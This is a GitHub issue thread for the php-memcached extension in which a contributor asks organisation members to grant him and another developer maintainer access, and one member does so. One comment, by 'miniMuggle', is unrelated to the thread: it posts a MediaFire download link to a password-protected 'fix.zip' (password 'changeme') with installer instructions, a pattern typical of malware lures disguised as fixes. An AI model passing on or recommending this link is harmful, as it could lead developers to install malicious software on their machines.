### ISSUE TITLE
Maintenance

### ISSUE THREAD

**Issue by m6w6** [php-memcached-dev/php-memcached#559]
I know, life goes on, priorities shift, etc. but this project is in dire need of, not even active, but even odd maintenance.

So here's my callout to all the people listed in the [php-memcached-dev](https://github.com/php-memcached-dev) org, sorry:

@poison
@andreiz
@dterei
@mkoppanen
@tricky
@iliaal
@krakjoe

Please add @remicollet and @m6w6 (me) to the org, so we can oddly, or maybe even actively, maintain this extension.

Reasons for Remi and me:
* Remi is the most rigorous _keep-that-php-extension-working-for-future-php_ guarantee I know of (kudos! BTW) and he's already *lead* on the pecl package!
* I'm oddly maintaining the main dependency ([libmemcaced-awesome](https://github.com/awesomized/libmemcached)), which has already spread to many linux distros...

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andreiz** [comment]
Done. I invited as members of "Developers" team, not sure how the
permissions are set up for that one vs "Core" though.

**Comment by m6w6** [comment]
Thank you very much, Andrei!

I don't see a settings tab, but I guess that's expected; everything else looks good!
